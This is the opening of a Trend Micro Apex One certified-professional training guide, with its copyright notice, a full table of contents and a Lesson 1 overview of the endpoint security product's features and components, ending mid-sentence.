Trend Micro™ Apex One

Training for Certified Professionals


eBook
Copyright © 2019 Trend Micro Incorporated. All rights reserved.

Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect,
and TrendLabs are trademarks or registered trademarks of Trend Micro Incorporated.
All other product or company names may be trademarks or registered trademarks of
their owners.

Portions of this manual have been reprinted with permission from other Trend Micro
documents. The names of companies, products, people, characters, and/or data
mentioned herein are fictitious and are in no way intended to represent any real
individual, company, product, or event, unless otherwise noted. Information in this
document is subject to change without notice.

No part of this publication may be reproduced, photocopied, stored in a retrieval system,
or transmitted without the express prior written consent of Trend Micro Incorporated.

Released: July 29, 2019


Trend Micro Apex One
Courseware v2
Trend Micro Apex One™
Training for Certified Professionals
Student Guide
Trend Micro Apex One Training for Certified Professionals - Student Guide

Table of Contents
Lesson 1: Trend Micro Apex One Overview ................................................................................ 1
Trend Micro Solutions ............................................................................................................................................... 1
Network Defense ................................................................................................................................................ 1
Hybrid Cloud Security ...................................................................................................................................... 2
User Protection .................................................................................................................................................. 2
Trend Micro Smart Protection Network ...................................................................................................... 2
Visibility and Control ........................................................................................................................................ 3
Trend Micro XGen™ Security ................................................................................................................................. 3
Smart .................................................................................................................................................................... 3
Optimized ............................................................................................................................................................ 3
Connected ........................................................................................................................................................... 4
Trend Micro Apex One ............................................................................................................................................. 4
Key Features of Trend Micro Apex One .............................................................................................................. 5
Malware Protection........................................................................................................................................... 5
Ransomware Protection .................................................................................................................................. 5
Predictive Machine Learning .......................................................................................................................... 5
Behavior Monitoring ......................................................................................................................................... 5
Connected Threat Defense ............................................................................................................................. 6
Web Threat Protection ..................................................................................................................................... 6
Firewall Protection ............................................................................................................................................ 6
Data Loss Prevention ....................................................................................................................................... 6
Device Control .................................................................................................................................................... 6
Outbreak Control ............................................................................................................................................... 6
Application Control ........................................................................................................................................... 7
Virtual Patching ................................................................................................................................................. 7
Endpoint Detection and Response ................................................................................................................ 7
Endpoint Encryption ......................................................................................................................................... 7
Cloud-Based Intelligence ................................................................................................................................. 7
Automated Updates .......................................................................................................................................... 7
Multi-Platform Support .................................................................................................................................... 7
Simplified Administration ................................................................................................................................ 8
Off-Premise Management ............................................................................................................................... 8
Unified Agent ...................................................................................................................................................... 8
Trend Micro Apex One Components .................................................................................................................... 9
Apex One Server ................................................................................................................................................ 9
Apex One (Mac) Server ...................................................................................................................................10
Database .............................................................................................................................................................10
Microsoft Internet Information Server ........................................................................................................10
Apex One/Apex One (Mac) Web Management Console ..........................................................................10
Apex Central ......................................................................................................................................................10
Security Agents ................................................................................................................................................. 11
Apex One Edge Relay Server .......................................................................................................................... 11
Trend Micro Smart Protection Network ...................................................................................................... 11
Smart Protection Server ................................................................................................................................. 11
Trend Micro ActiveUpdate Server ................................................................................................................. 11
Update Agents .................................................................................................................................................... 11
Trend Micro Endpoint Encryption ................................................................................................................ 12
Deep Discovery Analyzer ............................................................................................................................... 12
Mac Sandbox ...................................................................................................................................................... 12
Software as a Service Components ............................................................................................................. 12
Optional Third-Party Components ............................................................................................................... 13

© 2019 Trend Micro Inc. Education i
Trend Micro Apex One Deployment Methods ................................................................................................... 13
On-Premise Apex One Server ........................................................................................................................ 13
Apex One as a Service ..................................................................................................................................... 13
Threat Detection ......................................................................................................................................................14
Detecting Threats at the Entry Point ..........................................................................................................14
Detecting Threats Pre-execution .................................................................................................................14
Detecting Threats at Runtime .......................................................................................................................15
Detecting Threats at the Exit Point .............................................................................................................15

Lesson 2: Trend Micro Apex One Server ..................................................................................17
Apex One Server Tasks .......................................................................................................................................... 17
Apex One Server Services and Components ....................................................................................................18
Web Server .........................................................................................................................................................19
Apex One (Mac) Plug-in ..................................................................................................................................20
Configuration Repositories ...................................................................................................................................20
Apex One Database ................................................................................................................................................. 21
Installing the Apex One Server ............................................................................................................................. 21
Hardware Requirements ................................................................................................................................22
Apex One Server Pre-Installation Checklist ..............................................................................................22
Downloading Apex One Server for Windows ............................................................................................22
Running the Setup ........................................................................................................................................... 23
Installation Logs ..............................................................................................................................................35
Confirming Successful Installation ..............................................................................................................35
Ports and Protocols to Allow ........................................................................................................................36
Upgrading to Apex One ......................................................................................................................................... 37
Upgrading OfficeScan as a Service to Apex One as a Service ............................................................. 37
Upgrading OfficeScan to Apex One (on-premise) ................................................................................... 37
Upgrading OfficeScan (on-premise) to Apex One as a Service ............................................................41
Upgrading OfficeScan Agents to Apex One Security Agents ...............................................................42
Pre-Upgrade Backup Considerations ..........................................................................................................43
Migrating Apex One Servers ............................................................................................................................... 44
Server Service Setup Utility ................................................................................................................................ 46
Apex One (Mac) .......................................................................................................................................................47
Installing the Apex One (Mac) Plug-In ....................................................................................................... 48
Apex One Plug-Ins .................................................................................................................................................. 50
Apex One Data Protection ........................................................................................................................... 50
Trend Micro Endpoint Encryption Deployment Tool ............................................................................. 50
Apex One (Mac) ............................................................................................................................................... 50
Trend Micro Virtual Desktop Support ....................................................................................................... 50
Trend Micro Apex One Toolbox ....................................................................................................................51
Apex One Utilities ....................................................................................................................................................51
Authentication Certificate Manager ............................................................................................................51
Agent Packager ................................................................................................................................................51
Cisco Trust Agent .............................................................................................................................................51
Domains Schedule Update ............................................................................................................................52
Edge Relay Server Installer ...........................................................................................................................52
Gateway Settings Importer ...........................................................................................................................52
Image Setup ......................................................................................................................................................52
Agent Mover .....................................................................................................................................................53
Integrated Service Package ..........................................................................................................................53
Integrated Smart Protection Server Tool .................................................................................................53
Device List Tool ................................................................................................................................................53
Message Queue ................................................................................................................................................53
Console Password Reset Tool ..................................................................................................................... 54

Plug-in Manager Installer ............................................................................................................. 54
Apex One Settings Export Tool ................................................................................................................... 54
Apex One Server Migration Tool ................................................................................................................ 54
ServerProtect Normal Server Migration Tool ......................................................................................... 54
Server Tuner .....................................................................................................................................................55
Apex One VDI Pre-Scan Template Generation Tool ...............................................................................55
System Health Validator ................................................................................................................................55
Trend Micro Vulnerability Scanner .............................................................................................................55
Cache Generator ..............................................................................................................................................55
Touch Tool .........................................................................................................................................................56
Decrypt Tool .....................................................................................................................................................56

Lesson 3: Trend Micro Apex One Web Management Console ........................................... 57
Logging into the Web Management Console .................................................................................................. 58
Web Management Console Communication .............................................................................................59
Login Process .................................................................................................................................................. 60
Certificate warnings ...................................................................................................................................... 60
Timeout Mechanism .........................................................................................................................................61
Automatic Refresh ..........................................................................................................................................62
Active Directory Integration ................................................................................................................................62
Apex One Active Directory Integration Service .......................................................................................63
Authenticating Administrative Users From Active Directory ............................................................. 64
Administrative Accounts ...................................................................................................................................... 64
Defining User Roles .........................................................................................................................................65
Configuring User Accounts ...........................................................................................................................67
Domain permissions ........................................................................................................................................70
Recovering From Forgotten Passwords ............................................................................................................. 71

Lesson 4: Security Agents ...........................................................................................................73
Security Agent Tasks ............................................................................................................................................. 73
Security Agent Services and Components .......................................................................................................74
Security Agent Tree ...............................................................................................................................................76
Security Agent System Requirements .............................................................................................................. 77
Hardware Requirements ................................................................................................................................ 77
Installing Security Agents .....................................................................................................................................78
Security Agent Deployment Prerequisites ................................................................................................78
Remote Installation .........................................................................................................................................78
Unmanaged Endpoints .................................................................................................................................. 80
Installer Link ......................................................................................................................................................81
AutoPcc ...............................................................................................................................................................81
Agent Packager ...............................................................................................................................................82
Microsoft System Center Configuration Manager or Active Directory Installation ........................83
Agent Disk Images ...........................................................................................................................................83
Apex Central .....................................................................................................................................................83
Migrating From Other Endpoint Security Software ...................................................................................... 84
tmuninst_as.ptn .............................................................................................................................................. 84
tmuninst.ptn .................................................................................................................................................... 85
Coexist Mode ................................................................................................................................................... 85
Post Installation Tasks .......................................................................................................................................... 86
Component Updates ...................................................................................................................................... 86
Test Scan using EICAR Test Script ............................................................................................................. 86
Installation Logs ............................................................................................................................................. 86
Agent-To-Server Communication .......................................................................................................................87
Server-to-Agent Communication ....................................................................................................................... 88
Authenticating Server-Initiated Communications .................................................................................. 90
Support for third-party certificates .............................................................................................................91
Using a Single Key With Multiple Apex One Servers ...............................................................................91
Heartbeat ...................................................................................................................................................................91
Server Polling ...................................................................................................................................................92
Agent Connection Status ......................................................................................................................................92
Online .................................................................................................................................................................92
Offline .................................................................................................................................................................92
Independent ......................................................................................................................................................93
Off-premises .....................................................................................................................................................93
Endpoint Location ...................................................................................................................................................93
Reference Server List ................................................................................................................................... 94
Gateways ...........................................................................................................................................................95
Moving Agents Between Apex One Servers .....................................................................................................96
Agent Mover Tool ............................................................................................................................................96
Uninstalling Security Agents ............................................................................................................................... 98
Uninstalling From the Web Management Console ................................................................................. 98
Uninstalling from Windows Control Panel ................................................................................................ 98
Uninstalling Manually .....................................................................................................................................99
Custom Uninstall Tool ....................................................................................................................................99
Removing Inactive Agents ....................................................................................................................................99
Security Agent Settings ...................................................................................................................................... 100
Root Settings .................................................................................................................................................. 100
Domain Settings .............................................................................................................................................. 101
Agent Settings ................................................................................................................................................ 101
Agent Grouping ..................................................................................................................................................... 102
Manual Grouping ............................................................................................................................................ 102
Automatic Grouping ...................................................................................................................................... 102
Viewing Agent Status .......................................................................................................................................... 104
Viewing Agent Status on the Endpoint .................................................................................................... 104
Viewing Agent Status in the Web Management Console .................................................................... 106
Agent Self Protection .......................................................................................................................................... 106
Configuring Unauthorized Change Prevention ...................................................................................... 107
Kernel Mode Termination Protection ...................................................................................................... 109
Security Agent Service Restart ................................................................................................................. 109
Agent Privileges ..................................................................................................................................................... 110
Independent Mode Privileges ........................................................................................................................111
Scan Type Privileges ......................................................................................................................................113
Firewall Privileges ...........................................................................................................................................113
Behavior Monitoring Privileges ................................................................................................................... 114
Trusted Program List Privilege ................................................................................................................... 114
Mail Scan Privileges ........................................................................................................................................115
Proxy Configuration Privileges ....................................................................................................................115
Update Privileges ........................................................................................................................................... 116
Agent Unloading and Unlocking Privilege ................................................................................................ 116
Agent Uninstallation Privilege ......................................................................................................................117

Lesson 5: Managing Off-Premise Agents .............................................................................. 119


Edge Relay Server and External Agent Communications ........................................................................... 120
Installing the Apex One Edge Relay Server ......................................................................................................121
Registering the Edge Relay Server ................................................................................................................... 125
Viewing Off-Premise Agents ........................................................................................................................127
Apex One Relay Server Digital Certificates .....................................................................................................127

iv © 2019 Trend Micro Inc. Education


Trend Micro Apex One Training for Certified Professionals - Student Guide

Renewing Edge Relay Server Certificate ................................................................................................. 128

Lesson 6: Keeping Trend Micro Apex One Up To Date ....................................................... 129


ActiveUpdate ......................................................................................................................................................... 129
ActiveUpdate Integrity ................................................................................................................................. 129
Pattern Updates ............................................................................................................................................. 130
Incremental Updates .................................................................................................................................... 130
ActiveUpdate Logs ......................................................................................................................................... 130
Updating the Apex One Server ............................................................................................................................131
Manual Server Updates ..................................................................................................................................131
Scheduled Server Update .............................................................................................................................132
Server Update Source ...................................................................................................................................132
Updating Security Agents ....................................................................................................................................133
Automatic Updates ........................................................................................................................................133
Manual Updates ............................................................................................................................................. 134
Privilege-based Updates .............................................................................................................................. 135
Agent Update Source ................................................................................................................................... 135
Update Agents ....................................................................................................................................................... 136
Promoting an Agent to an Update Agent .................................................................................................137
Update Components ..................................................................................................................................... 138
Downloading and Deploying Updates .............................................................................................................. 139
Security Compliance ............................................................................................................................................ 140
Services ............................................................................................................................................................ 140
Components ..................................................................................................................................................... 141
Scan Compliance ........................................................................................................................................... 142
Settings ............................................................................................................................................................ 143
Update Summary ........................................................................................................................................... 144
Rollback ........................................................................................................................................................... 145
Server Tuner Tool ................................................................................................................................................. 146
Download Settings ........................................................................................................................................ 147
Network Traffic Settings ............................................................................................................................. 147
Default Settings ............................................................................................................................................. 147
Recommended Configurations for Improved Performance ............................................................... 148
Update Utilities ...................................................................................................................................................... 148
Domains Schedule Update Tool ................................................................................................................. 148
Scheduled Update Configuration Tool ..................................................................................................... 148

Lesson 7: Trend Micro Smart Protection ...............................................................................149


File Reputation Services .............................................................................................................................. 149
Web Reputation Services ............................................................................................................................ 149
Predictive Machine Learning Services ..................................................................................................... 150
Census Service ............................................................................................................................................... 150
Certified Safe Software Service ................................................................................................................ 150
Smart Feedback ...............................................................................................................................................151
Service URLs ....................................................................................................................................................151
Smart Protection Sources .................................................................................................................................. 152
Trend Micro Smart Protection Network .................................................................................................. 152
Smart Protection Server ............................................................................................................................. 152
Configuring the Agent Smart Protection Source .......................................................................................... 155

Lesson 8: Protecting Endpoint Computers From Malware ............................................... 157


Scanning for Malware .......................................................................................................................................... 157
NT Real-time Scan Service .......................................................................................................................... 157

Scan Settings ......................................................................................................................................................... 158
Real-Time Scan Settings .............................................................................................................................. 159
Manual Scan Settings ................................................................................................................................... 167
Scheduled Scan Settings ...............................................................................................................................171
Scan Now Settings ........................................................................................................................................ 174
Trusted Program List .....................................................................................................................................177
Scan Caching ...................................................................................................................................................177
Quarantining Detected Malware ....................................................................................................................... 179
Restoring Quarantined Files ....................................................................................................................... 180
Central Quarantine Restore ......................................................................................................................... 181
Smart Scan .............................................................................................................................................................. 181
File Reputation ............................................................................................................................................... 182
External CRC Database ................................................................................................................................ 184
CRC Caching ................................................................................................................................................... 186
Spyware/Grayware Protection .......................................................................................................................... 188
VSAPI ................................................................................................................................................................ 188
SSAPI ................................................................................................................................................................ 188
Damage Cleanup Services ........................................................................................................................... 190
Damage Cleanup Services Components ................................................................................................... 191
Assessment Mode ........................................................................................................................................... 191
Preventing Outbreaks .......................................................................................................................................... 192
Outbreak Prevention Policy ........................................................................................................................ 192
Outbreak Notifications ................................................................................................................................. 193
Starting Outbreak Prevention .................................................................................................................... 194
Terminating Outbreak Prevention ............................................................................................................ 196

Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring ................... 197


Behavior Monitoring ............................................................................................................................................. 197
Malware Behavior Blocking ......................................................................................................................... 198
Ransomware Protection .............................................................................................................................. 199
Anti-Exploit Protection ................................................................................................................................200
Fileless Malware Protection ......................................................................................................................200
Newly Encountered Program Protection ............................................................................................... 203
Event Monitoring .......................................................................................................................................... 205
Behavior Monitoring Exception List ................................................................................................................ 207

Lesson 10: Protecting Endpoint Computers From Unknown Threats ............................209


Common Vulnerabilities and Exposures Exploits ......................................................................................... 209
Supported File Types .................................................................................................................................... 210
Predictive Machine Learning ............................................................................................................................. 210
File Detections ..................................................................................................................................................211
Process Detections ........................................................................................................................................212
Enabling Predictive Machine Learning .............................................................................................................212
Exceptions ........................................................................................................................................................213
Connection Settings ......................................................................................................................................213
Offline Predictive Machine Learning ............................................................................................................... 215
Predictive Machine Learning Local File Model ....................................................................................... 215

Lesson 11: Blocking Web Threats .............................................................................................. 217


Web Reputation ......................................................................................................................................................217
Credibility Scores .......................................................................................................................................... 219
Configuring Web Reputation Settings ...................................................................................................... 219
Untested URLs ................................................................................................................................................221

Sample Sites ...................................................................................................................................................222
Dealing With False Positives .......................................................................................................................222
Intercepting HTTPS Traffic .........................................................................................................................222
Bypassing Web Reputation Analysis ........................................................................................................ 224
URL Analysis Order .......................................................................................................................................227
Assessment Mode ......................................................................................................................................... 228
Detecting Suspicious Connections .................................................................................................................. 228
Detecting Connections Through the Global C&C List .......................................................................... 228
Protecting Against Browser Exploits .............................................................................................................. 229

Lesson 12: Protecting Endpoint Computers Through Traffic Filtering ........................... 231
Traffic Filtering .......................................................................................................................................................231
Firewall Filtering .............................................................................................................................................231
Application Filtering ......................................................................................................................................232
Certified Safe Software List .......................................................................................................................232
Stateful Inspection ........................................................................................................................................232
Intrusion Detection System ........................................................................................................................232
Enabling the Apex One Firewall .........................................................................................................................233
Enabling the Apex One Firewall on Selected Endpoints ......................................................................233
Firewall Policies and Profiles ............................................................................................................................ 234
Firewall Policies ............................................................................................................................................ 234
Firewall Profiles .............................................................................................................................................237
Viewing Firewall Rules ................................................................................................................................ 240

Lesson 13: Preventing Data Leaks on Endpoint Computers ............................................. 243


Data Loss Prevention .......................................................................................................................................... 243
Installing Data Protection ........................................................................................................................... 244
Digital Asset Control ........................................................................................................................................... 247
Data Identifiers ............................................................................................................................................. 247
Data Loss Prevention Templates ............................................................................................................. 249
Data Loss Prevention Policies ................................................................................................................... 250
Detecting Digital Assets .............................................................................................................................. 254
Data Loss Prevention Logging .................................................................................................................. 255
Forensic Folder and DLP Database .......................................................................................................... 255
Device Control ...................................................................................................................................................... 255
USB Exception List ....................................................................................................................................... 258

Lesson 14: Deploying Policies Through Trend Micro Apex Central ................................. 261
Apex Central ........................................................................................................................................................... 261
Apex Central Services ......................................................................................................................................... 262
Apex Central Management Modes ................................................................................................................... 263
On-premise Management Mode ................................................................................................................ 263
Cloud Management Mode ........................................................................................................................... 263
Hybrid Mode ................................................................................................................................................... 264
Managing Apex One Policies in Apex Central ............................................................................................... 265
Connecting Apex One and Apex Central ................................................................................................ 265
Creating an Apex Central User Account ................................................................................................. 267
Adding Apex One to the Apex Central Product Directory .................................................................. 269
Selecting the Destination Product .............................................................................................................271
Identifying Policy Targets ...........................................................................................................................272
Defining Policy Settings .............................................................................................................................. 274
Deploying the Policy .................................................................................................................................... 275
Policy Inheritance ................................................................................................................................................ 276

Inherit From Parent ..................................................................................................................................... 276
Are Customizable ..........................................................................................................................................277
Extend from parent .......................................................................................................................................277
Data Discovery Policies .......................................................................................................................................277
Data Discovery ...............................................................................................................................................277
Data Discovery Policy Management .........................................................................................................277
Incident Investigation ................................................................................................................................... 281

Lesson 15: Detecting Emerging Malware Through Connected Threat Defense ......... 283
Detect .............................................................................................................................................................. 284
Respond .......................................................................................................................................................... 284
Protect ............................................................................................................................................................ 284
Visibility and control .................................................................................................................................... 284
Connected Threat Defense Requirements .................................................................................................... 284
How Connected Threat Defense Works .......................................................................................................... 285
Suspicious Activities .................................................................................................................................... 286
Deep Discovery Analyzer ................................................................................................................................... 286
Connecting Deep Discovery Analyzer to Apex Central ....................................................................... 287
Adding Deep Discovery Analyzer to the Apex Central Product Directory ....................................... 288
Suspicious Objects ............................................................................................................................................... 290
Submitting Samples ..................................................................................................................................... 290
Analyzing Samples ....................................................................................................................................... 290
Distributing Suspicious Object Details ..................................................................................................... 291
Mitigating Threats ......................................................................................................................................... 291
Subscribing Apex One to the Suspicious Objects List ................................................................................. 291
Tracking Suspicious Objects ............................................................................................................................. 293

Lesson 16: Blocking Unapproved Applications on Endpoint Computers ....................... 297


Integrated Application Control ........................................................................................................................ 297
Lockdown Mode .................................................................................................................................................... 297
Application Control Criteria .............................................................................................................................. 298
File Hash ......................................................................................................................................................... 298
File Paths ........................................................................................................................................................ 300
Digital Certificates ......................................................................................................................................... 301
Certified Safe Software List ...................................................................................................................... 304
Gray Software List ....................................................................................................................................... 305
Implementing Application Control ................................................................................................................... 306
Defining the Application Control Criteria ............................................................................................... 306
Creating the Policy ........................................................................................................................................ 307
Specifying the Security Agents That Will be Implementing the Policy ............................................ 310
Deploy the policy .............................................................................................................................................311
User-based Application Control .........................................................................................................................312
Best Practices for Enabling Application Control ............................................................................................313
Use Learn → Monitor → Refine .....................................................................................................................313
Use Lockdown .................................................................................................................................................313
In-house Applications ....................................................................................................................................313
Top Blocked Applications Widget ...............................................................................................................313
Trust Permissions ...........................................................................................................................................313
Application Control Criteria Pros and Cons ............................................................................................ 314

Lesson 17: Protecting Endpoint Computers From Vulnerabilities .................................. 315


Integrated Vulnerability Protection ................................................................................................................ 315
Vulnerability Protection Pattern ....................................................................................................................... 316

viii © 2019 Trend Micro Inc. Education


Trend Micro Apex One Training for Certified Professionals - Student Guide

Vulnerability Protection Rules ....................................................................................................................317


Implementing Vulnerability Protection ........................................................................................................... 318
Creating the Policy ........................................................................................................................................ 318
Specifying the Security Agents That Will be Implementing the Policy ............................................ 319
Deploy the policy .......................................................................................................................................... 320
Network Engine Settings ......................................................................................................................................321

Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers . 323
Integrated Endpoint Sensor ..............................................................................................................................323
Enabling Endpoint Sensor .......................................................................................................................... 325
Endpoint Detection and Response ................................................................................................................... 326
Apex One Incident Response Model .................................................................................................................327
Preliminary Assessment ......................................................................................................................................327
Preliminary Investigation ........................................................................................................................... 328
Custom Intelligence ..................................................................................................................................... 330
Virtual Analyzer Suspicious Object .......................................................................................................... 335
Root Cause Analysis ............................................................................................................................................ 336
Incident Response ................................................................................................................................................ 340
Terminating Suspicious Processes .......................................................................................................... 340
Adding Processes to the Suspicious Objects List .................................................................................. 341
Isolating Endpoints ........................................................................................................................................ 341
Detailed Investigation ......................................................................................................................................... 342
Attack Discovery .................................................................................................................................................. 350
Viewing the Attack Discovery Engine Log ............................................................................................. 350
Managed Detection and Response ................................................................................................................... 351
Trend Micro Managed Detection and Response Service ..................................................................... 351
Service Components .................................................................................................................................... 353
Managed Detection and Response Service Flow .................................................................................. 353
Configuring Apex Central for Managed Detection and Response Service ..................................... 354

Appendix A: Troubleshooting Trend Micro Apex One ....................................................... 357


Debugging Security Agents ............................................................................................................................... 357
Debugging the Apex One Server ...................................................................................................................... 357
Changing the Security Agent Communication Port .................................................................................... 358
On the Security Agent ................................................................................................................................. 358
Troubleshooting Agent/Server Communication Issues ............................................................................. 359
Verify the Connection Status Manually .................................................................................................. 359
Verify the Connection Status Automatically ......................................................................................... 359
Verify the Results of the Connection Status ......................................................................................... 360
Troubleshooting Communication Issues Between Security Agent and Server ............................ 360
Verify Security Agent Registry settings ................................................................................................. 360
Confirm Correct Product Licensing .......................................................................................................... 361
Verify Agent Privileges to Communicate With the Server .................................................................. 361
Verify Internet Information Services ...................................................................................................... 362
Re-establish Communication Using autopcc.exe .................................................................................. 362
Re-establish Communication Using IpXfer.exe ..................................................................................... 363
Verify Windows Firewall Blocking ............................................................................................................ 363
Change the Agent Domain ......................................................................................................................... 364
Verify Server Hostname Resolution ........................................................................................................ 364
Troubleshooting Virus Infection ...................................................................................................................... 364
Determining the Virus Infection Channel on the Server .................................................................... 365
Determining the Virus Infection Channel on the Agent ...................................................................... 365
Determining Spyware/Grayware Infection Channel on the Server ................................................. 366


Determining Spyware/Grayware Infection Channel on the Agent ................................................... 366


Troubleshooting the Firewall Service ............................................................................................................. 367
Troubleshooting the Unauthorized Change Prevention Service ............................................................. 367
Troubleshooting Edge Relay Server Certificates ......................................................................................... 368
Troubleshooting Sample Submission .............................................................................................................. 368

Appendix B: What’s New in Trend Micro Apex One ............................................................. 371


All-in-one Security Agent .....................................................................................................................................371
Offline Predictive Machine Learning .................................................................................................................371
Fileless Threat Detection Enhancements ........................................................................................................371
Integrated Vulnerability Protection ..................................................................................................................371
Integrated Application Control ...........................................................................................................................371
Investigative Capabilities ......................................................................................................................................371
Mac Protection Features .....................................................................................................................................372
Managed Detection and Response Service Support for SaaS ...................................................................372
Indicator of Attack Behavioral Analysis Enhancements .............................................................................372
Application Programming Interface Enhancements ....................................................................................372
Cloud Sandbox .......................................................................................................................................................372
Apex Central ...........................................................................................................................................................372
Kernel Mode Termination Protection ..............................................................................................................372
Location Awareness Enhancement ..................................................................................................................373



Lesson 1: Trend Micro Apex One Overview

Lesson Objectives:

After completing this lesson, participants will be able to:


• Describe the key features of Apex One
• Identify the components in an Apex One installation and describe their purpose

Trend Micro Solutions


Trend Micro provides layered content security with interconnected solutions that share data so you can
protect your users, network, data center, and cloud resources from data breaches and targeted attacks.

[Figure: Trend Micro Solutions: Network Defense, Hybrid Cloud Security, User Protection]

Network Defense
The enterprise is in the cross-hairs of an increasingly complex array of ransomware, advanced
threats, targeted attacks, vulnerabilities, and exploits.

Only complete visibility into all network traffic and activity will keep the organization ahead of
purpose-built attacks that bypass traditional controls, exploit network vulnerabilities, and either
ransom or steal sensitive data, communications, and intellectual property. Trend Micro Network
Defense detects and prevents breaches anywhere on the network to protect critical data and
reputation. It lets you rapidly detect, analyze, and respond to targeted attacks on your network, stop
targeted email attacks, and detect advanced malware and ransomware with custom sandbox analysis
before damage is done.


The Trend Micro Network Defense solution preserves the integrity of the network while ensuring
that data, communications, intellectual property, and other intangible assets are not monetized by
unwanted third parties. A combination of next-generation intrusion prevention and proven breach
detection enables the enterprise to prevent targeted attacks, advanced threats, and ransomware
from embedding or spreading within the network.

Hybrid Cloud Security


The Trend Micro Hybrid Cloud Security solution protects enterprise workloads in the data center and
the cloud from critical new threats, like ransomware, that can cause significant business disruptions,
while helping to accelerate regulatory compliance.

Hybrid Cloud Security delivers comprehensive, automated security for physical, virtual and cloud
servers. The organization can secure critical data and applications across their cloud and virtualized
environments with effective server protection that maximizes their operational and economic
benefits.

Whether you are focused on securing physical, virtual, cloud, or hybrid environments, Trend Micro
provides the advanced server security you need with the Trend Micro Deep Security platform.
Available as software, in the Amazon Web Services and Azure marketplace, or as a service, Deep
Security provides you with security optimized for VMware, Amazon Web Services, and Microsoft
Azure.

User Protection
The threat landscape is constantly changing, and traditional security solutions on endpoint
computers can’t keep up. Turning to multiple point products on a single endpoint results in too many
products that don’t work together, increasing complexity, slowing users, and leaving gaps in an
organization’s security.

To further complicate matters, organizations are moving to the cloud and need flexible security
deployment options that will adapt as their needs change.

Trend Micro User Protection is an interconnected suite of security products and advanced threat
defense techniques that protect users from ransomware and other threats across endpoints,
gateways, and applications, allowing the organization to secure all its users' activity on any
application, any device, anywhere.

Trend Micro Smart Protection Network


The Trend Micro Smart Protection Network mines data around the clock and across the globe to
ensure up-to-the-second threat intelligence to immediately stamp out attacks before they can harm
valuable enterprise data assets.

Trend Micro rapidly and accurately collates this wealth of global threat intelligence to customize
protection to the specific needs of your home or business and uses predictive analytics to protect
against the threats that are most likely to impact you.

To maintain this immense scale of threat protection, Trend Micro has created one of the world’s
most extensive cloud-based protection infrastructures, which collects more threat data from a
broader, more robust global sensor network to ensure customers are protected from the volume
and variety of threats today, including mobile and targeted attacks. New threats are identified
quickly using finely tuned automated custom data mining tools and human intelligence to root out
new threats within very large data streams.

Visibility and Control


Whether your endpoints are internal or external, you can manage a comprehensive set of security
capabilities from one single management console providing a strong level of visibility and control. In
addition, suspicious objects discovered by different applications can be consolidated into a single list
and distributed within the entire environment.

Trend Micro XGen™ Security


Trend Micro’s endpoint protection solution, powered by XGen, delivers a blend of cross-generational
threat defense techniques that are smart, optimized, and connected to protect endpoint computers
across the enterprise – all while preventing business disruptions and helping with regulatory compliance.

Smart
Protects against the full range of known and unknown threats using a cross-generational blend of
threat defense techniques that applies the right technique at the right time, and is powered by global
threat intelligence.

Optimized
Minimizes IT impact with solutions that are specifically designed for and integrated with leading
customer platforms and applications on endpoints computers. The footprint on the client
applications is minimized to ensure a more efficient use of resources.


Connected
Speeds time to response with automatic sharing of threat intelligence across security layers and
centralized visibility and control. XGen™ security uses proven techniques to quickly identify known
good or bad data, freeing advanced techniques to more quickly and accurately identify unknown
threats. Applying these techniques in rapid succession, with the right technique at the right time,
regardless of location and device across a connected system, maximizes both visibility and
performance. This core set of techniques powers each of the Trend Micro solutions, in a way that is
optimized for each layer of security: hybrid clouds, networks, and user environments.

Trend Micro Apex One


Apex One is the next evolution of the Trend Micro enterprise endpoint security solution and replaces
OfficeScan as Trend Micro’s flagship endpoint security product. Apex One can be installed as a new
product in the enterprise, or an existing OfficeScan XG installation can be upgraded to Apex One.

Apex One protects endpoint computers from malware, network viruses, Web-based threats, spyware,
and mixed threat attacks (both known and unknown). It uses a client/server architecture that consists of
a Security Agent program that resides on the endpoint and a Server program that manages all Agents.
The Agent guards the endpoint and reports on its security status to the Server. Apex One offers threat
detection, response, and investigation within a single agent on both Windows and Mac computers.

[Figure: Apex One architecture: Apex Central, Apex One Server, Apex One Web Management Console, Security Agents]

The Apex One Server is capable of providing real-time, bidirectional communication between the Server
and Security Agents using Hypertext Transfer Protocol Secure (HTTPS). The Apex One Web Management
console makes it easy for administrators to set coordinated security policies and deploy updates to
every endpoint Agent. In addition, different user access roles can be set up for specific administrative
tasks such as policy configuration, log query, and report generation.

Within the environment, Trend Micro Apex Central may also be deployed to provide centralized
management for many Trend Micro products, including Apex One. Once installed, Apex One can
integrate with Apex Central to provide additional security capabilities.


The Apex One Server downloads components (pattern file and program updates) from the Trend Micro
ActiveUpdate Server, Apex Central, or any other server or UNC path to which new patterns have been
uploaded.

Key Features of Trend Micro Apex One


Apex One provides a wide range of endpoint computer protection features. Some of these key features
include the following:

Note: Some of these features may require additional licensing.

Malware Protection
Endpoint protection is the primary focus of Apex One. Apex One protects endpoint computers from
security risks by scanning files for malware and then performing a specific action for each security
risk detected. To easily monitor, investigate and back-up infected files, Security Agents can
automatically forward infected or suspicious files to a quarantine folder.

Damage Cleanup Services clean computers of file-based and network viruses, and virus and worm
remnants (Trojans, registry entries, viral files) through a fully-automated process. Damage Cleanup
Services runs automatically in the background without having to configure it. Users are not even
aware when it runs unless Apex One needs to notify the user to restart their endpoint to complete
the process of removing a Trojan.

Ransomware Protection
Enhanced scan features can identify and block ransomware programs that target documents on
endpoint computers by identifying common behaviors and blocking processes commonly associated
with ransomware programs.

Predictive Machine Learning


Predictive Machine Learning can protect your network from new, previously unidentified, or
unknown threats through advanced file feature analysis and heuristic process monitoring. Apex One
delivers this functionality through a cloud-based machine learning model and introduces a local
model for computers without a network connection.

Behavior Monitoring
Behavior Monitoring constantly monitors and protects Agents from unusual and unauthorized
modifications to the operating system or installed software.


Connected Threat Defense


Connected Threat Defense is a collective feature of Trend Micro products to maximize network
protection. Security Agents can submit suspicious files to Deep Discovery Analyzer, where the file is
executed in a sandbox environment. Files determined to be dangerous are submitted to Apex
Central for addition to the Suspicious Objects List. You can configure Apex One to subscribe to the
Suspicious Objects List, and customized actions can be created for these objects. This provides
custom defense against threats identified by endpoints protected by Trend Micro products in your
environment.

Web Threat Protection


Web Reputation technology protects Agent computers within or outside the corporate network from
malicious and potentially dangerous Web sites. This service breaks the infection chain and prevents
downloading of malicious code. The credibility of Web sites and pages can be verified by integrating
Apex One with the Smart Protection Server or the Trend Micro Smart Protection Network.

The Apex One Suspicious Connection Service monitors the behavior of connections that endpoints
